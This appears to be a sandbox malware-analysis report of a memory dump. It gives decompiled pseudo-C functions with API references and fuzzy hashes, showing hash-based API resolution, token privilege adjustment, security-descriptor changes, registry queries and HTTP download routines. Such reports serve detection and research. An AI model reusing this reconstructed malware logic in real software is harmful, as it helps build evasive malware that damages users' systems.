0x0009ade2
0x0009ae17
0x0009ae22
0x00000000

APIs

Part of subcall function 000AB530: GetTokenInformation.KERNELBASE(0009ADD7,00000001,00000000,00000000,?,0009ADD7,00000000), ref: 000AB55A
Part of subcall function 000AB530: GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 000AB5B5

GetTokenInformation.KERNELBASE(00000000,0000000C,00000000,00000004,?), ref: 0009ADFF

Part of subcall function 0009B570: HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

CloseHandle.KERNEL32(00000000), ref: 0009AE22

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: InformationToken$CloseFreeHandleHeap
String ID:
API String ID: 2052167596-0
Opcode ID: e3736755abdd83e2246f2091c3adb6a3e94098db51c60689e66f7798f5d69735
Instruction ID: b37742305f65ce12f0e32efa7ea092cefdbb4e05abe4ea9711172d8814755a93
Opcode Fuzzy Hash: e3736755abdd83e2246f2091c3adb6a3e94098db51c60689e66f7798f5d69735
Instruction Fuzzy Hash: 5911C676E0011877EF2166A4BC12BAF76689F52B14F054134FD1866242FB71AA2496E3

Uniqueness

Uniqueness Score: -1.00%

Function 000AB530, Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000AB530(void* __eax, void* __eflags, void* _a4) {
				long _v20;
				int _t11;
				signed char _t16;
				void* _t17;
				int _t19;
				DWORD* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;

				_v20 = 0;
				E0009BF50(__eflags, 9, 0xbd557e);
				_t25 = _t24 + 8;
				_t21 =  &_v20;
				_t11 = GetTokenInformation(_a4, 1, 0, 0, _t21); // executed
				_t23 = 0;
				_t30 = _t11;
				if(_t11 == 0) {
					_t16 = E000955C0( *((intOrPtr*)(E0009BF50(_t30, 0, E00099D50(0x68042b4e))))(), 0x7a);
					_t25 = _t25 + 0x14;
					if((_t16 & 0x00000001) != 0) {
						_t17 = E00098290(_v20);
						_t25 = _t25 + 4;
						_t32 = _t17;
						if(_t17 != 0) {
							_t22 = _t17;
							E0009BF50(_t32, 9, 0xbd557e);
							_t25 = _t25 + 8;
							_t19 = GetTokenInformation(_a4, 1, _t22, _v20, _t21); // executed
							_t23 = _t22;
							if(_t19 == 0) {
								E0009B570(_t22);
								_t25 = _t25 + 4;
								_t23 = 0;
							}
						}
					}
				}
				return _t23;
			}

0x000ab537
0x000ab545
0x000ab54a
0x000ab54d
0x000ab55a
0x000ab55c
0x000ab55e
0x000ab560
0x000ab57f
0x000ab584
0x000ab589
0x000ab58e
0x000ab593
0x000ab596
0x000ab598
0x000ab59a
0x000ab5a3
0x000ab5a8
0x000ab5b5
0x000ab5b9
0x000ab5bb
0x000ab5be
0x000ab5c3
0x000ab5c6
0x000ab5c6
0x000ab5bb
0x000ab598
0x000ab589
0x000ab5d1

APIs

GetTokenInformation.KERNELBASE(0009ADD7,00000001,00000000,00000000,?,0009ADD7,00000000), ref: 000AB55A

Part of subcall function 00098290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000982E8

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 000AB5B5

Part of subcall function 0009B570: HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: HeapInformationToken$AllocateFreeLibraryLoad
String ID:
API String ID: 4190244075-0
Opcode ID: e9df4782b3d0bedd82831b1e8aec7463e4f43b0cfaf2e9cbd653cad5c26c96fd
Instruction ID: c02346bfaffdcde126331413b0063d1c4020c592f3f22175bb62d888ac9fafc5
Opcode Fuzzy Hash: e9df4782b3d0bedd82831b1e8aec7463e4f43b0cfaf2e9cbd653cad5c26c96fd
Instruction Fuzzy Hash: 1E01C872E8071836EE6165F47C43FBF7D5D9F52B59F050030F90CA5193F6929A1491A2

Uniqueness

Uniqueness Score: -1.00%

Function 0009E030, Relevance: 3.1, APIs: 2, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0009E030(void* __eflags, void* _a4, short* _a8, short* _a12) {
				void* _t9;
				long _t12;
				signed int _t14;
				intOrPtr* _t15;
				int _t20;
				signed int _t21;

				_t31 = __eflags;
				_t20 = (E000A5000(_t9, __eflags, 0xffffffff) & 0x000000ff) << 0x00000008 | 0x00000001;
				E0009BF50(_t31, 9, 0xda29a27);
				_t12 = RegOpenKeyExW(_a4, _a8, 0, _t20,  &_a4); // executed
				if(_t12 == 0) {
					E0009BF50(__eflags, 9, 0x8097c7);
					_t14 = RegQueryValueExW(_a4, _a12, 0, 0, 0, 0); // executed
					__eflags = _t14;
					_t7 = _t14 == 0;
					__eflags = _t7;
					_t21 = _t20 & 0xffffff00 | _t7;
					_t15 = E0009BF50(_t7, 9, 0x3111c69);
					 *_t15(_a4);
				} else {
					_t21 = 0;
				}
				return _t21;
			}

0x0009e030
0x0009e04c
0x0009e056
0x0009e067
0x0009e06b
0x0009e07b
0x0009e08f
0x0009e091
0x0009e093
0x0009e093
0x0009e093
0x0009e09d
0x0009e0a8
0x0009e06d
0x0009e06d
0x0009e06d
0x0009e0b0

APIs

RegOpenKeyExW.KERNEL32(00000000,80000001,00000000,00000000,?,?,?,?), ref: 0009E067
RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 0009E08F

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: OpenQueryValue
String ID:
API String ID: 4153817207-0
Opcode ID: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
Instruction ID: 78661935677944fcadbb7ef02a500823dea520f1cf60ceb67f17524cb1b54881
Opcode Fuzzy Hash: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
Instruction Fuzzy Hash: 3601F9776803183EEF1059A5AC53FEA3608DB81B65F140130FE1CAA1C3EAD1FA1596F1

Uniqueness

Uniqueness Score: -1.00%

Function 00093F90, Relevance: 3.1, APIs: 2, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00093F90(void* _a4, intOrPtr _a8) {
				intOrPtr _t4;
				long _t8;
				void* _t10;
				void* _t14;
				void* _t15;
				long _t17;

				_t4 = _a8;
				_t25 = _t4;
				if(_t4 == 0) {
					return 0;
				}
				_t8 = E000922E0(_t25, E00091460(_t25, _t4, 0x8f5419a3) + 4, 0x8f5419a3);
				_t26 = _a4;
				_t17 = _t8;
				if(_a4 == 0) {
					E0009BF50(__eflags, 0, 0x8685de3);
					_t10 = RtlAllocateHeap( *0xb2124, 8, _t17); // executed
					return _t10;
				}
				E0009BF50(_t26, 0, E00099D50(0x6caeab8f));
				_t15 =  *0xb2124; // 0x3c0000
				_t14 = RtlReAllocateHeap(_t15, E00099D50(0x647400a4), _a4, _t17); // executed
				return _t14;
			}

0x00093f96
0x00093f99
0x00093f9b
0x00000000
0x00093ffb
0x00093fb4
0x00093fbc
0x00093fc0
0x00093fc2
0x00094006
0x00094017
0x00000000
0x00094017
0x00093fd4
0x00093fdc
0x00093ff7
0x00000000

APIs

RtlReAllocateHeap.NTDLL(003C0000,00000000,00000000,00000000), ref: 00093FF7
RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00094017

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 47756d77778bd37679b19cedd15490441639e744638df791e2f3920e79aaed9f
Instruction ID: 59310788cf4f6075fd4ca10262006a59aba758a0c958dda9fa40e88a89838614
Opcode Fuzzy Hash: 47756d77778bd37679b19cedd15490441639e744638df791e2f3920e79aaed9f
Instruction Fuzzy Hash: 9801F9B6D041047BEE102274FC13FAE369C9B653ADF050430FD0DA1203F9619B14AAF2

Uniqueness

Uniqueness Score: -1.00%

Function 000A9C40, Relevance: 2.5, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A9C40(void* __eflags, void** _a4) {
				int _t6;
				int _t8;
				void** _t10;
				void* _t11;
				void* _t12;

				_t10 = _a4;
				_t6 = E00094A90( *_t10, 0);
				_t12 = _t11 + 8;
				_t15 = _t6 & 0x00000001;
				if((_t6 & 0x00000001) == 0) {
					E0009BF50(_t15, 0, 0xb1fd105);
					_t12 = _t12 + 8;
					_t6 = VirtualFree( *_t10, 0, 0x8000); // executed
				}
				_t16 = _t10[2];
				if(_t10[2] != 0) {
					E0009BF50(_t16, 0, 0xb8e7db5);
					_t8 = CloseHandle(_t10[2]); // executed
					return _t8;
				}
				return _t6;
			}

0x000a9c44
0x000a9c4b
0x000a9c50
0x000a9c53
0x000a9c55
0x000a9c5e
0x000a9c63
0x000a9c6f
0x000a9c6f
0x000a9c71
0x000a9c75
0x000a9c7e
0x000a9c89
0x00000000
0x000a9c89
0x000a9c8d

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C6F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C89

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CloseFreeHandleVirtual
String ID:
API String ID: 2443081362-0
Opcode ID: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
Instruction ID: 905793d0daaa26e2a5b72c4c53da7d7b4e298965dc6cf40139e6e8747d7e902f
Opcode Fuzzy Hash: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
Instruction Fuzzy Hash: 0FE0D836784304B6EE2036E0FD17F9472945F11B66F104434FA8D751E6F6E279109AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0009BF50, Relevance: 1.7, APIs: 1, Instructions: 182
libraryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0009BF50(void* __eflags, signed int _a4, signed int _a8) {
				signed int* _v20;
				char _v52;
				char _v159;
				signed int _t32;
				intOrPtr _t35;
				struct HINSTANCE__* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed int _t51;
				signed int* _t52;
				signed int _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				void* _t62;

				_t60 = _a8;
				_t32 = E00099D50(0x647402c4);
				_t62 = _t61 + 4;
				_t57 = _t60 % _t32;
				_t35 =  *((intOrPtr*)(0xb2cb8 + _t57 * 4));
				_t58 = _t57;
				if(_t35 == 0) {
					L4:
					_t51 = _a4;
					_v20 = 0xb2cb8 + _t58 * 4;
					if(_t51 > 0x23) {
						L39:
						_t37 =  *(0xb2134 + _t51 * 4);
						if( *(0xb2134 + _t51 * 4) != 0) {
							L49:
							_t38 = E0009D830(_t37, _t60);
							_t52 = _v20;
							__eflags = _t38;
							if(__eflags != 0) {
								L52:
								 *_t52 = _t60;
								 *(0xb4198 + _t58 * 4) = _t38;
								return _t38;
							}
							_t39 = E0009BF50(__eflags, 0, 0xba94474);
							 *_t39(0);
							L51:
							_t38 = 0;
							goto L52;
						}
						if(_t51 == 0x17) {
							_t37 =  *0xb37cc; // 0x0
							__eflags = _t37;
							if(__eflags != 0) {
								L48:
								 *(0xb2134 + _t51 * 4) = _t37;
								goto L49;
							}
							L46:
							_t41 = E0009BF50(_t77, 0, 0xba94474);
							 *_t41(0);
							 *(0xb2134 + _t51 * 4) = 0;
							_t52 = _v20;
							goto L51;
						}
						if(_t51 == 0x16) {
							_t37 =  *0xb4b38; // 0x0
							__eflags = _t37;
							if(__eflags == 0) {
								goto L46;
							}
							goto L48;
						}
						if(_t51 != 0x15) {
							_t37 = LoadLibraryA( &_v52); // executed
							__eflags = _t37;
							if(__eflags != 0) {
								goto L48;
							}
							goto L46;
						}
						_t37 =  *0xb37d0; // 0x0
						_t77 = _t37;
						if(_t37 != 0) {
							goto L48;
						}
						goto L46;
					}
					switch( *((intOrPtr*)(_t51 * 4 +  &M000B00B0))) {
						case 0:
							L38:
							E0009C560( &_v52, E0009D0A0(0xb0550, 0xb0550,  &_v159), 0xffffffff);
							_t62 = _t62 + 0x14;
							goto L39;
						case 1:
							goto L38;
						case 2:
							__eax = 0xb0bfc;
							goto L38;
						case 3:
							__eax = 0xb0894;
							goto L38;
						case 4:
							__eax = 0xb1044;
							goto L38;
						case 5:
							__eax = 0xb05e2;
							goto L38;
						case 6:
							__eax = 0xb07e9;
							goto L38;
						case 7:
							__eax = 0xb043c;
							goto L38;
						case 8:
							__eax = 0xb0538;
							goto L38;
						case 9:
							__eax = 0xb0781;
							goto L38;
						case 0xa:
							__eax = 0xb09fc;
							goto L38;
						case 0xb:
							__eax = 0xb097c;
							goto L38;
						case 0xc:
							__eax = 0xb101b;
							goto L38;
						case 0xd:
							__eax = 0xb07a6;
							goto L38;
						case 0xe:
							__eax = 0xb068d;
							goto L38;
						case 0xf:
							__eax = 0xb0b87;
							goto L38;
						case 0x10:
							__eax = 0xb0c24;
							goto L38;
						case 0x11:
							__eax = 0xb0b75;
							goto L38;
						case 0x12:
							__eax = 0xb09bc;
							goto L38;
						case 0x13:
							__eax = 0xb04b8;
							goto L38;
						case 0x14:
							__eax = 0xb052c;
							goto L38;
						case 0x15:
							goto L39;
						case 0x16:
							__eax = 0xb0814;
							goto L38;
						case 0x17:
							__eax = 0xb0900;
							goto L38;
						case 0x18:
							__eax = 0xb0480;
							goto L38;
						case 0x19:
							__eax = 0xb076e;
							goto L38;
						case 0x1a:
							__eax = 0xb0699;
							goto L38;
						case 0x1b:
							__eax = 0xb04db;
							goto L38;
						case 0x1c:
							__eax = 0xb0c31;
							goto L38;
						case 0x1d:
							__eax = 0xb0b60;
							goto L38;
						case 0x1e:
							__eax = 0xb09c4;
							goto L38;
						case 0x1f:
							__eax = 0xb0a2c;
							goto L38;
						case 0x20:
							__eax = 0xb09a6;
							goto L38;
					}
				}
				0;
				0;
				while(1) {
					_t69 = _t35 - _t60;
					if(_t35 == _t60) {
						break;
					}
					E00091460(_t69, _t58, 1);
					_t62 = _t62 + 8;
					_t58 =  >  ? 0 : _t58 + 1;
					_t35 =  *((intOrPtr*)(0xb2cb8 + _t58 * 4));
					if(_t35 != 0) {
						continue;
					}
					goto L4;
				}
				return  *(0xb4198 + _t58 * 4);
			}

0x0009bf5c
0x0009bf64
0x0009bf69
0x0009bf74
0x0009bf76
0x0009bf7d
0x0009bf81
0x0009bfb6
0x0009bfb6
0x0009bfc0
0x0009bfc6
0x0009c0fe
0x0009c0fe
0x0009c107
0x0009c163
0x0009c165
0x0009c16d
0x0009c170
0x0009c172
0x0009c189
0x0009c189
0x0009c18b
0x00000000
0x0009c18b
0x0009c17b
0x0009c185
0x0009c187
0x0009c187
0x00000000
0x0009c187
0x0009c10c
0x0009c127
0x0009c12c
0x0009c12e
0x0009c15c
0x0009c15c
0x00000000
0x0009c15c
0x0009c130
0x0009c137
0x0009c141
0x0009c143
0x0009c14e
0x00000000
0x0009c14e
0x0009c111
0x0009c153
0x0009c158
0x0009c15a
0x00000000
0x00000000
0x00000000
0x0009c15a
0x0009c116
0x0009c1a1
0x0009c1a7
0x0009c1a9
0x00000000
0x00000000
0x00000000
0x0009c1ab
0x0009c11c
0x0009c121
0x0009c123
0x00000000
0x00000000
0x00000000
0x0009c125
0x0009bfd1
0x00000000
0x0009c0df
0x0009c0f6
0x0009c0fb
0x00000000
0x00000000
0x00000000
0x00000000
0x0009bfee
0x00000000
0x00000000
0x0009bff8
0x00000000
0x00000000
0x0009c002
0x00000000
0x00000000
0x0009c00c
0x00000000
0x00000000
0x0009c016
0x00000000
0x00000000
0x0009c020
0x00000000
0x00000000
0x0009c02a
0x00000000
0x00000000
0x0009c034
0x00000000
0x00000000
0x0009c03e
0x00000000
0x00000000
0x0009c048
0x00000000
0x00000000
0x0009c052
0x00000000
0x00000000
0x0009c05c
0x00000000
0x00000000
0x0009c063
0x00000000
0x00000000
0x0009c06a
0x00000000
0x00000000
0x0009c071
0x00000000
0x00000000
0x0009c078
0x00000000
0x00000000
0x0009c07f
0x00000000
0x00000000
0x0009c086
0x00000000
0x00000000
0x0009c08d
0x00000000
0x00000000
0x00000000
0x00000000
0x0009c094
0x00000000
0x00000000
0x0009c09b
0x00000000
0x00000000
0x0009c0a2
0x00000000
0x00000000
0x0009c0a9
0x00000000
0x00000000
0x0009c0b0
0x00000000
0x00000000
0x0009c0da
0x00000000
0x00000000
0x0009c0b7
0x00000000
0x00000000
0x0009c0be
0x00000000
0x00000000
0x0009c0c5
0x00000000
0x00000000
0x0009c0cc
0x00000000
0x00000000
0x0009c0d3
0x00000000
0x00000000
0x0009bfd1
0x0009bf89
0x0009bf8d
0x0009bf90
0x0009bf90
0x0009bf92
0x00000000
0x00000000
0x0009bf97
0x0009bf9c
0x0009bfa8
0x0009bfab
0x0009bfb4
0x00000000
0x00000000
0x00000000
0x0009bfb4
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6b596c4b825b87af034dd83db79eddaacb788d6ace99750f3c6a484d6c5f2052
Instruction ID: 0b1bd87d8382e675236564e8b84030d3a1a2fb833d4548e60d4beaf6911734a0
Opcode Fuzzy Hash: 6b596c4b825b87af034dd83db79eddaacb788d6ace99750f3c6a484d6c5f2052
Instruction Fuzzy Hash: 5F517361F88309D7FF20AA98EC50EFFA2969795308F508132B507CB293D62ADD807756

Uniqueness

Uniqueness Score: -1.00%

Function 000AB390, Relevance: 1.6, APIs: 1, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E000AB390(void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v74;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr* _t29;
				signed char _t31;
				void* _t32;
				intOrPtr* _t33;
				void* _t34;
				void* _t35;
				intOrPtr* _t37;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t43;
				intOrPtr* _t45;
				void* _t47;
				void* _t48;
				signed char _t49;
				intOrPtr* _t50;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t65;
				void* _t68;

				_t55 = _a8;
				_t26 = E0009BF50(__eflags, 9, 0xc654d62);
				_t62 = _t61 + 8;
				_t27 =  *_t26(_t55, 1);
				_t56 = 0;
				_t75 = _t27;
				if(_t27 != 0) {
					_t29 = E0009BF50(_t75, 9, 0x4a9139c);
					_t31 = E000955C0( *_t29(_t55, 1, 0, 0), 0);
					_t64 = _t62 + 0x10;
					if((_t31 & 0x00000001) == 0) {
						_t50 = _a4;
						_v20 = 0;
						_t32 = E00091C20();
						_t77 = _t32 - 3;
						if(_t32 < 3) {
							__eflags = _t32 - 2;
							if(__eflags != 0) {
								goto L10;
							} else {
								_t33 = E0009BF50(__eflags, 9, 0xabc78f7);
								_t65 = _t64 + 8;
								_t34 =  *_t33(0xb10d8, 1,  &_v20, 0);
								__eflags = _t34;
								if(_t34 == 0) {
									goto L10;
								} else {
									goto L7;
								}
							}
						} else {
							_t43 = E00099D50(0x647400a5);
							_t45 = E0009BF50(_t77, _t43, E00099D50(0x6ec8785b));
							_t47 = E00097200(0xb10b0,  &_v74);
							_t48 =  *_t45(_t47, 1,  &_v20, 0); // executed
							_t49 = E000955C0(_t48, 0);
							_t65 = _t64 + 0x20;
							if((_t49 & 0x00000001) == 0) {
								L7:
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t35 = E00099D50(0x647400a5);
								_t37 = E0009BF50(__eflags, _t35, E00099D50(0x6cdc2320));
								_t68 = _t65 + 0x10;
								__eflags =  *_t37(_v20,  &_v28,  &_v32,  &_v24);
								if(__eflags == 0) {
									L9:
									_t39 = E0009BF50(__eflags, 0, 0x982abe5);
									 *_t39(_v20);
									goto L10;
								} else {
									_t41 = E0009BF50(__eflags, 9, 0x4a8239c);
									_t68 = _t68 + 8;
									__eflags =  *_t41(_t55, _v28, _v32, _v24);
									if(__eflags == 0) {
										goto L9;
									}
								}
							} else {
								L10:
								_v20 = 0xffffffff;
							}
						}
						if(_t50 != 0) {
							 *_t50 = 0xc;
							 *((intOrPtr*)(_t50 + 4)) = _t55;
							 *((intOrPtr*)(_t50 + 8)) = 0;
						}
						_t56 = _v20;
					}
				}
				return _t56;
			}

0x000ab399
0x000ab3a3
0x000ab3a8
0x000ab3ae
0x000ab3b0
0x000ab3b2
0x000ab3b4
0x000ab3c1
0x000ab3d5
0x000ab3da
0x000ab3df
0x000ab3e5
0x000ab3e8
0x000ab3ef
0x000ab3f4
0x000ab3f7
0x000ab451
0x000ab454
0x00000000
0x000ab45a
0x000ab461
0x000ab466
0x000ab476
0x000ab478
0x000ab47a
0x00000000
0x00000000
0x00000000
0x00000000
0x000ab47a
0x000ab3f9
0x000ab3fe
0x000ab417
0x000ab42a
0x000ab43b
0x000ab440
0x000ab445
0x000ab44a
0x000ab480
0x000ab480
0x000ab487
0x000ab48e
0x000ab49a
0x000ab4b3
0x000ab4b8
0x000ab4cc
0x000ab4ce
0x000ab4ef
0x000ab4f6
0x000ab501
0x00000000
0x000ab4d0
0x000ab4d7
0x000ab4dc
0x000ab4eb
0x000ab4ed
0x00000000
0x00000000
0x000ab4ed
0x000ab44c
0x000ab503
0x000ab503
0x000ab503
0x000ab44a
0x000ab50c
0x000ab50e
0x000ab514
0x000ab517
0x000ab517
0x000ab51e
0x000ab51e
0x000ab3df
0x000ab52a

APIs

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000), ref: 000AB43B

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: DescriptorSecurity$ConvertLibraryLoadString
String ID:
API String ID: 3927295052-0
Opcode ID: b422763720d8ec2f1195fc1ee137594ed78134cb5476533bc3a2dd39b7380023
Instruction ID: cdfd1708e76530cfbf0315baddca517396f0df51418b593272bf9a4082254807
Opcode Fuzzy Hash: b422763720d8ec2f1195fc1ee137594ed78134cb5476533bc3a2dd39b7380023
Instruction Fuzzy Hash: EA41B7B2D402156BEF216BE0AC53FFF7668AF11715F050424FA18B5283F7A1AA0596E2

Uniqueness

Uniqueness Score: -1.00%

Function 0009D270, Relevance: 1.6, APIs: 1, Instructions: 98
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0009D270(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				signed short _v32;
				intOrPtr _v40;
				char _v44;
				void* _t22;
				void* _t23;
				intOrPtr _t26;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t37;
				void* _t43;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;

				_t22 = E000AFCF0(__ecx);
				_t54 =  &_v44;
				_t23 = E000A0190(__eflags, _t22,  &_v44);
				_t57 = _t56 + 8;
				_t64 = _t23;
				if(_t23 == 0) {
					_t43 = 0;
				} else {
					_t26 = E000AB790(_t64,  *0xb2838, _v44, _v32 & 0x0000ffff, _a8); // executed
					_t58 = _t57 + 0x10;
					if(_t26 == 0) {
						_t43 = 0;
					} else {
						_v20 = 1 + (0 | _v30 == 0x00000002) * 4;
						_t31 = E000AF190(__edx);
						_t32 = E000AEE10(__edx);
						_v20 = _t26;
						_t33 = E000ABAD0(_v30 - 2, _t26, _v40, 0, _t32, _t31, _v20); // executed
						_t61 = _t58 - 4 + 0x1c;
						if(_t33 == 0) {
							_t43 = 0;
							_t54 =  &_v44;
						} else {
							_t53 = _t33;
							_t37 = E00091AF0(_t53,  &_v28, 0,  *0xb2c80); // executed
							_t62 = _t61 + 0x10;
							_t68 = _t37;
							_t54 =  &_v44;
							if(_t37 == 0) {
								_t43 = 0;
								__eflags = 0;
							} else {
								E000AF410(_v28, _a4, _v28, _v24 + _v28);
								E0009B570(_v28);
								_t62 = _t62 + 4;
								_t43 = 1;
							}
							E0009BF50(_t68, 0x13, 0x714b685);
							_t61 = _t62 + 8;
							InternetCloseHandle(_t53); // executed
						}
						E000ABA40(_t68, _v20);
						_t58 = _t61 + 4;
					}
					E000AB690(_t54);
				}
				return _t43;
			}

0x0009d27b
0x0009d280
0x0009d285
0x0009d28a
0x0009d28d
0x0009d28f
0x0009d337
0x0009d295
0x0009d2a6
0x0009d2ab
0x0009d2b0
0x0009d33b
0x0009d2b6
0x0009d2ca
0x0009d2cd
0x0009d2d6
0x0009d2e8
0x0009d2ec
0x0009d2f1
0x0009d2f6
0x0009d33f
0x0009d341
0x0009d2f8
0x0009d2f8
0x0009d307
0x0009d30c
0x0009d30f
0x0009d311
0x0009d314
0x0009d346
0x0009d346
0x0009d316
0x0009d323
0x0009d32b
0x0009d330
0x0009d333
0x0009d333
0x0009d34f
0x0009d354
0x0009d358
0x0009d358
0x0009d35e
0x0009d363
0x0009d363
0x0009d367
0x0009d36c
0x0009d378

APIs

Part of subcall function 000AB790: InternetOpenA.WININET(000B0580,?,00000000,00000000,00000000,?,0009CD77,?,?,?,00000001,00000000,?,0009CD77,?,00000001), ref: 000AB7C2
Part of subcall function 000AB790: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 000AB862

Part of subcall function 000ABAD0: HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 000ABBA3

Part of subcall function 00091AF0: InternetReadFile.WININET(?,?,00040000,00040000), ref: 00091B86

InternetCloseHandle.WININET(00000000), ref: 0009D358

Part of subcall function 0009B570: HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Internet$Open$CloseConnectFileFreeHandleHeapHttpReadRequest
String ID:
API String ID: 3651809878-0
Opcode ID: d7d22948cb9a4f5c1e9cd48b0aac864fac0640b8ca60a1617f4aa234b30d8a89
Instruction ID: 08c8c731cd60d4795642b458628f1f94130608dbed7bd3f3a156df419ae2e68f
Opcode Fuzzy Hash: d7d22948cb9a4f5c1e9cd48b0aac864fac0640b8ca60a1617f4aa234b30d8a89
Instruction Fuzzy Hash: 7321E4B2E401096BDF00ABE4AC42AFF7BB9DF45754F084435FA04A7203E7759A15A6A2

Uniqueness

Uniqueness Score: -1.00%

Function 000A0F60, Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E000A0F60(void* __eflags, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v88;
				char _v288;
				void* _t18;
				intOrPtr* _t20;
				void* _t23;
				void* _t24;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				void* _t45;
				void* _t51;
				void* _t52;
				void* _t55;

				_t55 = __eflags;
				_v20 = 0;
				E000A9C90(_t55, E00097200(0xb1060,  &_v88), 1); // executed
				_t18 = E00099D50(0x647400a5);
				_t20 = E0009BF50(_t55, _t18, E00099D50(0x6ec8785b));
				_t36 =  !=  ? 0xb08d0 : 0xb10b0;
				_t23 = E00097200( !=  ? 0xb08d0 : 0xb10b0,  &_v288);
				_t51 = _t45 + 0x28;
				_t24 =  *_t20(_t23, 1,  &_v20, 0);
				_t57 = _t24;
				if(_t24 != 0) {
					_v24 = 0;
					_t26 = E0009BF50(_t57, 9, 0x8a8238c);
					_t52 = _t51 + 8;
					_t27 =  *_t26(_v20,  &_v32,  &_v24,  &_v28);
					_t58 = _t27;
					if(_t27 != 0) {
						_t30 = E0009BF50(_t58, 9, 0x90ec817);
						_t31 = E00099D50(0x647400bc);
						_t52 = _t52 + 0xc;
						 *_t30(_a4, _a8, _t31, 0, 0, 0, _v24); // executed
					}
					_t28 = E0009BF50(_t58, 0, 0x982abe5);
					 *_t28(_v20);
				}
				return 1;
			}

0x000a0f60
0x000a0f72
0x000a0f8a
0x000a0f97
0x000a0fb0
0x000a0fc6
0x000a0fd1
0x000a0fd6
0x000a0fe2
0x000a0fe4
0x000a0fe6
0x000a0fe8
0x000a0ff6
0x000a0ffb
0x000a100d
0x000a100f
0x000a1011
0x000a101d
0x000a102f
0x000a1034
0x000a1043
0x000a1043
0x000a104c
0x000a1057
0x000a1057
0x000a1065

APIs

Part of subcall function 000A9C90: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 000A9D70

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

SetNamedSecurityInfoW.ADVAPI32(00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 000A1043

Memory Dump Source

Source File: 00000005.00000002.2354321778.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

